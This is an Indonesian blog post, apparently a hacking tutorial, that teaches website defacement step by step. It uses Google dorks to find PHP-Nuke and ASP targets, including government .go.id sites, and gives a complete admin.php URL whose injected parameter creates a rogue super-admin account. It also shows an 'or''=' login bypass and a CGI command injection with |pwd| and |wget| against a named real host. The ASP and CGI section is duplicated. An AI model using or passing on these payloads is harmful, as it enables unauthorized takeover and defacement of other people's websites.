New Post

Archive

Home » » CARA DEFACE WEB

CARA DEFACE WEB

web jomla defaceDeface situs php nuke pakai google. Coba search di google:

.com/nuke/index.php atau .org/nuke/index.php

Jika sudah ditemukan targetnya, tinggal ikuti langkah berikut :

1. http://www.target.com/nuke/admin.php => (index.php yg diatas tadi dirubah menjadi admin.php)
2. Masukkan bug ini di belakang situs tadi : ?op=AddAuthor&add_aid=smartbekantan&add_name=God&add_pwd=render07&add_email=bekantan@yahoo.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
misalnya : http://www.target.com/nuke/admin.php?
http://www.target.com/nuke/admin.php?op=AddAuthor&add_aid=smartbekantan&add_
name=
God&add_pwd=render07&add_email=
bekantan@yahoo.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
Jika tidak bisa berarti situs tersebut sudah dipath oleh admin nya.

Tapi jika berhasil, maka di url/browsing akan muncul http://www.target.com/nuke/admin.php?op=mod_author
4. Login, dan masukan id & password tadi.
Masih ingat kan ?
id=smartbekantan => liat yg diatas tadi
password=render07 => liat yg diatas tadi. Nah kita sekarang sudah masuk ke “Administration Menu” situs tersebut. Kamu sudah bisa utak atik dan menguasai website tersebut.

Deface asp dengan sql injection

1. buka browsing/url http://www.google.co.id
2. ketik site:go.id login.asp
misal nya kita dapat target http://www.situstarget.com/
login.asp
3. username dan pass ketik ‘or”=’
4. buka satu persatu file yg ada disana
5. cari file yg bisa kita ubah/deface
6. buka browsing/url baru lalu ketikkan target tadi misalnya http://www.situsarget.com
7. kalo hasil nya belum ada, klik tab refresh disamping url tersebut.
deface cgi https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html <<<
page=”coart_frontpage.html|pwd|”
page=”coart_frontpage.html|wget” nya =’”>https://bronte.netpresence.com.au/~wolfsecu/arai.html
…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< target =”"> allinurl*.cgi *
page:.*html+site:.us atau http://www.google.co.id/
search?q=allinurl*.cgi%3Fpage%3D*.html
+site:.com&hl=id&lr=&start=10&sa=N
target harus file .html diujungnya jika ingin ditambah |pwd|

Mudah kan? Kamu sudah jadi seorang defacer sekarang :)

tapi ingat #Hacker not a destroyer :D

1. buka browsing/url http://www.google.co.id
2. ketik site:go.id login.asp
misal nya kita dapat target http://www.situstarget.com/
login.asp
3. username dan pass ketik ‘or”=’
4. buka satu persatu file yg ada disana
5. cari file yg bisa kita ubah/deface
6. buka browsing/url baru lalu ketikkan target tadi misalnya http://www.situsarget.com
7. kalo hasil nya belum ada, klik tab refresh disamping url tersebut.
deface cgi https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html <<<
page=”coart_frontpage.html|pwd|”
page=”coart_frontpage.html|wget” nya =’”>https://bronte.netpresence.com.au/~wolfsecu/arai.html
…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< target =”"> allinurl*.cgi *
page:.*html+site:.us atau http://www.google.co.id/
search?q=allinurl*.cgi%3Fpage%3D*.html
+site:.com&hl=id&lr=&start=10&sa=N
target harus file .html diujungnya jika ingin ditambah |pwd|

0 komentar:

Post a Comment